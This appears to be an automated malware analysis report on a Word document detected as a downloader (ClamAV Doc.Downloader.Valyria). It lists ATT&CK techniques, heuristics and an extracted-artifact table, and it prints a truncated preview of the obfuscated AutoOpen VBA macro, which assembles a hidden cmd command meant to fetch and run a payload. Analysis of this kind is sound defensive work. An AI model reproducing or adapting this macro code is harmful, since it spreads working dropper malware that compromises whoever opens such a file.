Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains a legacy WordBasic AutoOpen macro, indicating it is designed to execute automatically upon opening. The macro's shell command is obfuscated but appears to be constructing a command to download and execute a payload. The ClamAV detection name 'Doc.Downloader.Valyria-6667199-0' further supports this downloader functionality. The primary attack vector is likely spearphishing attachment.
Heuristics (5)
- ClamAV: Doc.Downloader.Valyria-6667199-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6667199-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5943 bytes |
SHA-256: b989d8f4dd0ce06b60cd5a8114f1d4e45f9b301be015dff2cd3c39fdd6a58735
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "nTMfALYjRDpc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Atn(NBqVtP)
TypeName CBool(131045097)
TypeName Sin(vkWIEO)
TypeName 2071
TypeName ChrW(HYjvA)
Shell@ CStr("c") + CStr("m") + zjXOWJJwcjZUrh + bnPiWio + GTCiwKQSNFr + BISGrtbn + pjhimJUNo + oScqnawICbM + JhIiVTCT + wlYOrGDPkZD, 759428588 - 759428588
TypeName CStr(86602 - HKfzN)
TypeName 4
End Sub
Attribute VB_Name = "lKZHHflFj"
Function GTCiwKQSNFr()
On Error Resume Next
TypeName 204847816
TypeName iLznz
SqwALRMvl = "d /V:O/C" + CStr(Chr(irauraTKvvusR + GdIRTiJ + 34 + kwzNLXOvZh + oMGHEXCszGk)) + "set V" + "WL=b" + "STrtTNaNqs" + "mm" + "hufiKwPSuS" + "SQsqF" + "dyG(D" + "Rl7){pg"
TypeName Log(93093 / MGSri)
TypeName nVqtRZ
TypeName Fix(424772730)
tuvNJ = "W\,.kn/z" + "13J xvjVM" + "$:5'" + "=;Ie@" + "oc+-AC}8&&" + "for" + " " + "%q i" + "n (38;" + "66;18;64" + ";" + "3;25;13" + ";64;34;3"
TypeName Tan(iPodPj)
TypeName Sqr(85890 * rOWiXD - 37263 - kNfrB)
TypeName Tan(7)
aAQolIiaZTW = "4" + ";51;" + "57;16;24" + ";34;61" + ";45;6" + "4;18;69;66" + ";0;54;64;6" + "7;4;51;" + "8;64;4" + ";43;40;64" + ";0;71;34" + ";16;64;4" + "5;4"
TypeName 298
TypeName kuXSiT
TypeName 504
nDTiIjuX = ";6" + "2" + ";57;40;" + "24;5" + "6;61;60;1" + "3" + ";4;4;38;" + "58" + ";46;" + "46;" + "7;3"
TypeName CLng(LkDSAh)
TypeName 4683
TypeName ChrW(IhzWp * HnPRmT)
JWXSsi = "8;45;64;" + "7;25" + ";4" + ";" + "3;16;38;" + "43" + ";67"
TypeName UrLjn
TypeName ttjTbr
TypeName BrwCYf
IRZKPDmmWR = ";66;12" + ";" + "46;" + "4;70;" + "27;63;23;5" + "2;"
GTCiwKQSNFr = SqwALRMvl + tuvNJ + aAQolIiaZTW + nDTiIjuX + JWXSsi + IRZKPDmmWR
TypeName wLVwA
TypeName MiiAIV
End Function
Function BISGrtbn()
On Error Resume Next
TypeName Mwwmi
TypeName dHoHl
TypeName CSng(746)
hbblGHjlL = "65;13;" + "4;4;3" + "8;58;4" + "6;46;" + "2"
TypeName 330104091
TypeName Fix(wBqqBB - zXHkc + qtnUj / iPvJh)
WiJSEuH = "5;4" + ";" + "7;3;69" + ";4;66;21" + ";3;47;43" + ";" + "67;66;12;4" + "6;13;28;" + "65;" + "13;4;4;38;" + "58;46;46;1" + "8;18;18;4"
TypeName 4
TypeName Int(jMRnQ)
KBDRbw = "3;67;66" + ";16;45;" + "2" + "8;3;66" + ";38;47;43"
TypeName 90722396
TypeName QXBrIF
TypeName CSng(28951 / iMvzb / 60085 / TsmOAn)
lFhrinRfi = ";" + "67;66;12" + ";46;18;38" + ";69;67;66" + ";45;4" + ";64;45;"
TypeName Atn(wAAiQ)
TypeName 1
TypeName KpwMn
JCzkMk = "4;4" + "6;7;16;" + "48;18;12;6" + "9;0;7;67" + ";4" + "4;21;" + "38;25;46" + ";28;" + "53;55;" + "65;" + "1" + "3;"
TypeName CDbl(5371)
TypeName 19
TypeName RZlmjZ
tCkXRa = "4;4" + ";38;58;" + "46;46;16;4" + "5;66;52" + ";" + "1"
BISGrtbn = hbblGHjlL + WiJSEuH + KBDRbw + lFhrinRfi + JCzkMk + tCkXRa
TypeName 216247733
TypeName CByte(RpzHEz + bqCvh / 14194 * NVnJti)
TypeName CLng(GGTzi)
End Function
Function pjhimJUNo()
On Error Resume Next
TypeName CLng(RDkCo / JVnSEi)
TypeName Sqr(LdooS)
OcKSwBzEjO = "2" + ";64;4;7;34" + ";16" + ";45;25" + ";38" + ";64;67;" + "66;64;25" + ";43;67;66;" + "12;46;3"
TypeName Rnd(26327082)
TypeName CBool(BtjPtw)
TypeName Sgn(CStlf)
VrCzURMkqw = "2;65;13;" + "4;4;3" + "8;58;46;" + "46;39;" + "3;2" + "1;38;66;1" + "6;45;"
TypeName oFLiCM
TypeName 263800505
TypeName CStr(18328 / BdiWf)
AhlwZJcv = "7;34" + ";6" + "4;45;43;" + "67;6" + "6;12;46;2" + "3;5"
TypeName Sqr(3511)
TypeName CSng(4)
SaPbdISTfzn = "0;53;" + "18;13;3" + "5;15;" + "60;43;2" + "3;38;3" + "4;16;4" + ";31;60;65" + ";60;36;62" + ";57;24;47" + ";67;" + "51;61;51" + ";60;59;4" + "9;73;60;6"
TypeName Round(91)
TypeName ChrW(95297 / cCrVZ)
TypeName CDbl(72)
SJTCXiBPWB = "2;57;" + "55;1" + "5;30;61" + ";57;6" + "4;45" + ";53;58;4;6" + "4;" + "12;38;68" + ";"
TypeName CStr(988)
TypeName uVLSof
TypeName
... (truncated)